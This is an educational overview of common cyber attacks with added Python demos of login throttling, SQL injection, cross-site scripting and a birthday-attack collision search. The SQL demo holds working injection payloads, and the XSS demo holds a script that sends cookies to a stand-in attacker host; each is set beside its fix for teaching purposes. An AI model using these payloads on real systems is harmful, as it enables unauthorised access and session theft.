Cyber Attacks
Malware
Malware is any code that can be used to steal data, bypass access controls or cause
harm to or compromise a system.
Viruses
A virus is a type of computer program that, when executed, replicates by
attaching itself to other files, such as legitimate programs, inserting its own
code into them. Some viruses are harmless, but others are destructive, for
example those that modify or delete data. Most viruses require end-user
interaction to activate, and some are written to act only on a specific date or
time.
Viruses spread through removable media such as USB flash drives, internet
downloads, and email attachments. The simple act of opening a file or executing
an infected program can trigger a virus. Once a virus is active, it will usually
infect other programs on the computer or on other computers on the network. Some
viruses (polymorphic and metamorphic viruses) change their own code with each
infection to evade signature-based detection.
Worms
A worm is malicious software that replicates by independently exploiting
vulnerabilities in networked systems. Unlike a virus, which needs a host program
to run, a worm runs by itself. Other than the initial infection of the host,
worms do not require user participation, and they can spread very quickly across
a network, usually slowing it down in the process.
Worms share a common pattern: they exploit a vulnerability to get onto a system,
they have a mechanism for propagating themselves to other hosts, and they usually
carry malicious code (a payload) that damages the systems or networks they reach.
Even a worm with no payload causes harm through the scanning and replication
traffic it generates.
Trojan horse
A Trojan horse is malware that carries out malicious operations while masking
its true intent. It appears legitimate (a game, a utility, a document) but is, in
fact, very dangerous. Because a Trojan runs as the user who launched it, it
inherits all of that user's privileges, which is one reason not to do everyday
work from an administrator account.
Unlike viruses, Trojans do not self-replicate. They are often disguised as, or
bundled with, seemingly harmless files such as images, audio, or video files
that act as a decoy so that unsuspecting users run them.
Logic Bombs
A logic bomb is malicious code that lies dormant until a trigger, such as a
specific date and time or the appearance of a particular database entry, sets it
off. Until that trigger event happens, the logic bomb remains inactive.
Once activated, a logic bomb runs its malicious code, which can harm a computer
in various ways: sabotaging database records, erasing files, and attacking
operating systems or applications. Because the code sits harmlessly in place
until the trigger fires, logic bombs are a classic insider technique.
Ransomware
This malware holds a computer system, or the data it contains, captive until a
payment is made.
Ransomware usually works by encrypting your data so that you cannot access it.
According to the ransom note, once the ransom is paid, typically in a
cryptocurrency chosen because it is hard to trace, the cybercriminal will supply
a program that decrypts the files or send an unlock key. In reality, many
victims never regain access to their data even after they have paid.
Some ransomware families exploit specific system vulnerabilities to spread from
machine to machine. Ransomware is most often delivered through phishing emails
that encourage you to open a malicious attachment, or through an unpatched
software vulnerability. Offline, tested backups are the only reliable way to
recover without paying.
DNS spoofing
DNS spoofing, or DNS cache poisoning, is an attack in which false data is
introduced into a DNS resolver's cache, the temporary store in which a resolver
(or a client's operating system) keeps recently resolved name-to-address records
so that repeat lookups do not have to be sent to the authoritative servers.
These attacks exploit weaknesses in how caching resolvers check that a response
really belongs to the query they sent, so that a forged answer is accepted and
cached. From then on the resolver directs traffic for a legitimate domain to the
IP address of an illicit server, and every client that trusts that resolver is
redirected for as long as the forged record's time-to-live (TTL) lasts. DNSSEC
validation lets a resolver reject records that are not signed by the domain's
owner.
Man-in-the-Middle (MitM)
A MitM attack, also known as an on-path attack, happens when a cybercriminal
inserts themselves between two communicating parties without their knowledge,
for example by taking control of an intermediate device or by tricking a victim
into routing traffic through a host the attacker controls. From this position
an attacker can intercept, manipulate and relay traffic between the sender and
the intended destination while both sides believe they are talking directly to
each other. Authenticated encryption such as TLS, with certificate validation
that is not bypassed, is the standard defence.
Zero-Day Attacks
A zero-day attack, or zero-day threat, exploits a software vulnerability before
the vendor knows about it or has released a patch, so that defenders have had
"zero days" to prepare.
Brute force attacks
A brute-force attack gets its name from the "brutish" or simple method it uses:
the attacker simply tries to guess the login credentials of someone with access
to the target system. Once a guess is right, they are in.
While this may sound time-consuming and difficult, attackers use automated tools
or bots to do the guessing. The attacker gives the tool a list of candidate
credentials (a dictionary of common passwords, or username and password pairs
leaked from other breaches) and the tool tries each one while the attacker
waits. Once a correct pair is found, the criminal has access.
To slow brute-force attacks, have lock-out and rate-limiting policies in place
as part of your authentication architecture. After a certain number of failed
attempts, the account being targeted is locked for a period of time. Because
the lock applies to the account rather than to the client, an attacker who
switches to a different device or IP address cannot bypass it. The trade-off is
that an attacker who knows a username can deliberately lock the legitimate user
out, so lockouts are usually combined with progressive delays between attempts,
monitoring of failed logins, and multi-factor authentication.
It is also wise to use long, random passwords without dictionary words, dates,
or sequences of numbers in them. A password made only of 10 digits has just
10^10 possibilities and falls quickly to offline guessing, but a random
10-character password drawn from the full keyboard (letters, digits and
symbols) has roughly 5 x 10^19 possibilities, which would take even a fast
guessing tool many years of non-stop attempts to exhaust.
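The lockout and rate-limiting policy described above, as an added example that is not part of the original page: a login check with salted password hashing, a constant-time comparison, a per-account failure counter with lockout and progressive delay, and a helper that shows why a digits-only password is so much weaker than a random one. The policy values, user record and guess rates are assumptions for illustration.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple

# Policy values are assumptions for this example, not from the original page.
MAX_FAILURES = 5          # failed attempts before the account is locked
LOCKOUT_SECONDS = 900     # how long the lock lasts
PBKDF2_ROUNDS = 50_000    # cost factor for the stored password hash


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, hash). A random salt per user defeats precomputed tables."""
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


class LoginThrottle:
    """Per-account failure counter with lockout and progressive delay.

    State is keyed by username, not by client IP, so switching devices or
    addresses does not reset the counter.
    """

    def __init__(self) -> None:
        self.failures: Dict[str, int] = {}
        self.locked_until: Dict[str, float] = {}

    def is_locked(self, username: str, now: float) -> bool:
        until = self.locked_until.get(username)
        if until is None:
            return False
        if now >= until:                      # lock expired: reset the account
            del self.locked_until[username]
            self.failures.pop(username, None)
            return False
        return True

    def delay_seconds(self, username: str) -> int:
        """Progressive delay before the next attempt: 1, 2, 4, 8 ... capped at 60 s."""
        n = self.failures.get(username, 0)
        return 0 if n == 0 else min(2 ** (n - 1), 60)

    def record_failure(self, username: str, now: float) -> None:
        self.failures[username] = self.failures.get(username, 0) + 1
        if self.failures[username] >= MAX_FAILURES:
            self.locked_until[username] = now + LOCKOUT_SECONDS

    def record_success(self, username: str) -> None:
        self.failures.pop(username, None)
        self.locked_until.pop(username, None)


def attempt_login(store: Dict[str, Tuple[bytes, bytes]], throttle: LoginThrottle,
                  username: str, password: str, now: float) -> str:
    """Return 'ok', 'locked' or 'denied'. Unknown users follow the bad-password path."""
    if throttle.is_locked(username, now):
        return "locked"
    record = store.get(username)
    if record is None:
        # Hash anyway so response time does not reveal whether the username exists.
        hash_password(password, b"\x00" * 16)
        throttle.record_failure(username, now)
        return "denied"
    salt, stored = record
    _, candidate = hash_password(password, salt)
    if hmac.compare_digest(candidate, stored):   # constant-time comparison
        throttle.record_success(username)
        return "ok"
    throttle.record_failure(username, now)
    return "denied"


def seconds_to_exhaust(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    """Time to try every password of the given length at the given guessing rate."""
    return (alphabet_size ** length) / guesses_per_second


if __name__ == "__main__":
    store = {"alice": hash_password("Tr0ub4dor&3")}          # constructed user record
    throttle = LoginThrottle()
    guesses = ["123456", "password", "qwerty", "letmein", "admin", "Tr0ub4dor&3"]
    for t, guess in enumerate(guesses):
        result = attempt_login(store, throttle, "alice", guess, now=float(t))
        print(f"t={t} guess={guess!r:14} -> {result} (next delay {throttle.delay_seconds('alice')} s)")
    print("10 digits at 1e9 guesses/s:", seconds_to_exhaust(10, 10, 1e9), "seconds")
    print("10 printable chars at 1e9 guesses/s:",
          round(seconds_to_exhaust(94, 10, 1e9) / 31_557_600), "years")
```

The sixth attempt in the demo is the correct password, but it is refused because the fifth failure locked the account; a production deployment keeps the counters in shared storage (a database or cache) so that every login server sees the same state.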
DoS and DDoS attacks
A denial-of-service (DoS) attack is designed to overwhelm the resources of a
system to the point where it can no longer reply to legitimate service requests.
A distributed denial-of-service (DDoS) attack has the same goal but is launched
from a vast array of malware-infected host machines (a botnet) controlled by the
attacker, which makes it far harder to block by source address. They are called
"denial of service" attacks because the victim site is unable to provide service
to those who want to use it.
In a DoS attack, the target site is flooded with illegitimate requests. Because
the site has to spend resources handling each request, its capacity is consumed
by the flood. This makes it impossible for the site to serve users as it
normally does and often results in the site becoming completely unavailable.
Phishing attacks
A phishing attack occurs when a malicious actor sends emails that seem to be
coming from trusted, legitimate sources in an attempt to grab sensitive information
from the target. Phishing attacks combine social engineering and technology and
are so-called because the attacker is, in effect, “fishing” for access to a forbidden
area by using the “bait” of a seemingly trustworthy sender.
SQL injection attacks
Structured Query Language (SQL) injection is a common way of attacking websites
that depend on databases to serve their users. The web application builds an
SQL query from input it receives from the client (a login form, a search box, a
URL parameter) and sends the query to the database server. If the application
pastes that input directly into the query text, an attacker can insert, or
"inject", SQL syntax of their own in place of the value that normally goes
there, such as a username or password. The database then runs the attacker's
command along with the application's, allowing the attacker to bypass
authentication, read or modify data they should not have access to, and in some
configurations run commands on the server. The fix is to keep data and code
apart by using parameterised queries, so that user input is never parsed as
SQL.
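The login check described above written both ways, as an added example that is not from the original page: a string-built query that an attacker can reshape, beside the parameterised version. It runs against an in-memory SQLite database with two constructed user rows; the rows, the payloads and the clear-text password column are all assumptions made so the injection stays visible (a real application stores salted hashes).

```python
import sqlite3
from typing import Optional, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample data for the demo; passwords are in clear only for brevity."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str,
                     password: str) -> Optional[Tuple[str, str]]:
    """String-built query: whatever the client sends becomes part of the SQL text."""
    query = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchone()


def login_safe(conn: sqlite3.Connection, username: str,
               password: str) -> Optional[Tuple[str, str]]:
    """Parameterised query: values travel separately and are never parsed as SQL."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


if __name__ == "__main__":
    conn = make_db()
    # Payload constructed for the demo: it closes the password literal and appends
    # a tautology, so the WHERE clause is true for every row and the first row
    # (the admin) is returned without knowing any password.
    tautology = "' OR '1'='1"
    # Second classic payload: the SQL comment marker discards the password check.
    comment_out = "alice' --"
    print("vulnerable, real creds :", login_vulnerable(conn, "bob", "hunter2"))
    print("vulnerable, tautology  :", login_vulnerable(conn, "anyone", tautology))
    print("vulnerable, comment    :", login_vulnerable(conn, comment_out, "irrelevant"))
    print("safe, tautology        :", login_safe(conn, "anyone", tautology))
    print("safe, comment          :", login_safe(conn, comment_out, "irrelevant"))
```

With the tautology payload the vulnerable query becomes `... WHERE username = 'anyone' AND password = '' OR '1'='1'`, and because AND binds tighter than OR every row matches; the parameterised version looks for a user whose password is literally the string `' OR '1'='1` and finds none.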
Insider threats
Sometimes, the most dangerous actors come from within an organization. People
within a company’s own doors pose a special danger because they typically have
access to a variety of systems, and in some cases, admin privileges that enable
them to make critical changes to the system or its security policies.
XSS attacks
With XSS, or cross-site scripting, the attacker gets a malicious script into a
web page that the vulnerable application serves to other users, either by
storing it in the application (for example in a comment or profile field) or by
crafting a link whose parameters the application reflects back into the page.
When the victim loads the page or clicks the link, their browser runs the
script with the same privileges as the site's own code. Because the victim is
already logged in, the script can read data on the page, send requests that the
application accepts as coming from the legitimate user, and (unless the session
cookie is marked HttpOnly) steal the session cookie itself, so actions the
attacker chose are carried out by the "user". The root cause is that untrusted
input is written into HTML without being encoded for the context it lands in.
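The reflection described above, as an added example that is not from the original page: a page fragment rendered with and without output encoding, for both an element body and an attribute value. The attacker payloads and the hostname `attacker.example` are constructed for the demo; the code shows what the browser would receive, which is the difference between executing the payload and displaying it as text.

```python
import html

# Constructed payloads for the demo. The first would, in a real browser, send the
# victim's cookies to a hypothetical attacker host; the second breaks out of an
# attribute value and adds an event handler.
SCRIPT_PAYLOAD = (
    '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'
)
ATTRIBUTE_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def render_vulnerable(name: str) -> str:
    """Reflects the parameter straight into the HTML: the browser parses it as markup."""
    return f"<p>Welcome back, {name}!</p>"


def render_safe(name: str) -> str:
    """Encodes &, <, >, \" and ' so the value is displayed, never parsed as tags."""
    return f"<p>Welcome back, {html.escape(name, quote=True)}!</p>"


def render_attr_vulnerable(name: str) -> str:
    """Attribute context without encoding: a double quote ends the value early."""
    return f'<input name="user" value="{name}">'


def render_attr_safe(name: str) -> str:
    """Attribute context: the value must be quoted AND have both quote characters escaped."""
    return f'<input name="user" value="{html.escape(name, quote=True)}">'


def has_active_markup(fragment: str) -> bool:
    """Crude check used here only to show which rendering lets a payload through."""
    lowered = fragment.lower()
    return "<script" in lowered or " onfocus=\"" in lowered


if __name__ == "__main__":
    for label, out in [
        ("element, vulnerable", render_vulnerable(SCRIPT_PAYLOAD)),
        ("element, safe      ", render_safe(SCRIPT_PAYLOAD)),
        ("attribute, vulnerable", render_attr_vulnerable(ATTRIBUTE_PAYLOAD)),
        ("attribute, safe      ", render_attr_safe(ATTRIBUTE_PAYLOAD)),
    ]:
        print(f"{label}: active={has_active_markup(out)}\n    {out}")
```

Output encoding is context-specific: the same `html.escape` call is right for element bodies and quoted attributes, but a value placed inside a `<script>` block, a URL, or an unquoted attribute needs a different encoder. Marking the session cookie HttpOnly and serving a Content-Security-Policy header limit the damage if an encoding is missed.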
Birthday attack
A birthday attack targets the hash functions used to verify the integrity and
authenticity of messages. A message's hash is what gets digitally signed, and
the receiver recomputes and checks it before accepting the message as
authentic; the hash is not itself the signature, but if two messages share a
hash, a signature over one is equally valid for the other. The attack takes its
name from the birthday paradox: in a group of only 23 people the chance that
two share a birthday already exceeds 50 percent, and in the same way an
attacker needs only about 2^(n/2) tries, not 2^n, to find any two inputs that
collide under an n-bit hash. An attacker who prepares many harmless-looking
variants of a message and many variants of a fraudulent one, finds a pair with
the same hash, and gets the victim to sign the harmless one can then substitute
the fraudulent one; the receiver accepts it because it carries the right hash.
This is why a hash used for signatures needs an output long enough that 2^(n/2)
work is out of reach, and why hash functions with practical collision attacks
(MD5, SHA-1) must not be used for signing.
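The two-sided collision search described above, as an added example that is not from the original page: SHA-256 truncated to 24 bits stands in for a weak short hash so that the search finishes in a fraction of a second, and a set of benign contract variants is grown alongside a set of fraudulent ones until a hash appears in both. The messages, names and the way variants are generated are constructed for the demo; a real attacker varies wording, spacing or metadata so that every variant reads the same to the victim.

```python
import hashlib
import math
from typing import Dict, Tuple

HASH_BITS = 24  # assumption for the demo; real hashes are 256 bits or more


def short_hash(message: bytes, bits: int = HASH_BITS) -> int:
    """Top `bits` bits of SHA-256, standing in for a weak short hash."""
    digest = hashlib.sha256(message).digest()
    return int.from_bytes(digest, "big") >> (256 - bits)


def benign_variant(i: int) -> bytes:
    """Constructed harmless message; the counter models a cosmetic variation."""
    return f"I, Bob, agree to pay Alice 100 USD. Ref {i:06x}".encode()


def malicious_variant(i: int) -> bytes:
    """Constructed fraudulent message the attacker wants the signature to cover."""
    return f"I, Bob, agree to pay Mallory 100000 USD. Ref {i:06x}".encode()


def expected_trials(bits: int) -> float:
    """Birthday bound: about sqrt(pi/2 * 2^bits) samples before a collision is likely."""
    return math.sqrt(math.pi / 2 * 2 ** bits)


def find_collision(bits: int = HASH_BITS) -> Tuple[bytes, bytes, int, int]:
    """Grow both sets together until a benign and a malicious variant share a hash.

    Returns (benign_message, malicious_message, hash_value, variants_per_side).
    """
    benign_seen: Dict[int, bytes] = {}
    malicious_seen: Dict[int, bytes] = {}
    for i in range(1 << bits):
        b = benign_variant(i)
        hb = short_hash(b, bits)
        if hb in malicious_seen:
            return b, malicious_seen[hb], hb, i + 1
        benign_seen[hb] = b
        m = malicious_variant(i)
        hm = short_hash(m, bits)
        if hm in benign_seen:
            return benign_seen[hm], m, hm, i + 1
        malicious_seen[hm] = m
    raise RuntimeError("no collision found")  # astronomically unlikely at this size


if __name__ == "__main__":
    benign, malicious, h, trials = find_collision()
    print(f"benign   : {benign!r}")
    print(f"malicious: {malicious!r}")
    print(f"shared {HASH_BITS}-bit hash: {h:#08x}")
    print(f"variants per side: {trials}  (birthday estimate {expected_trials(HASH_BITS):.0f},"
          f" brute-force preimage would need ~{1 << HASH_BITS})")
```

The number of variants needed stays in the low thousands for a 24-bit hash, against roughly 16 million for finding a message matching one fixed hash; the same square-root saving is why a 128-bit digest offers only about 64 bits of collision resistance.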